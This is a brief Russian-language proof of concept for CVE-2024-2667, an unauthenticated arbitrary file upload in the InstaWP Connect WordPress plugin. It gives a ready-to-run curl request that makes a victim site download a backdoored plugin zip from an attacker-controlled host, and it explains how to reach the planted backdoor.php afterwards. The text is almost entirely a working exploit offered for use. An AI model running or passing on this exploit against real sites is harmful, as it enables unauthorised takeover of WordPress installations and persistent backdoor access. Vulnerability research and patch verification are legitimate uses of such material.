
Это POC для CVE-2024-2667 (InstaWP Connect — WP-стейджинг и миграция в один клик <= 0.1.0.22 — неаутентифицированная произвольная загрузка файлов)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> Вы можете использовать любой валидный или невалидный API-ключ.
override_plugin_zip -> Путь к zip-файлу, содержащему вредоносный плагин WordPress с бэкдором.
После импорта вы можете получить доступ к бэкдору через http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (при условии, что имя каталога — malicious-plugin, а backdoor.php находится в этом каталоге).
Ссылки: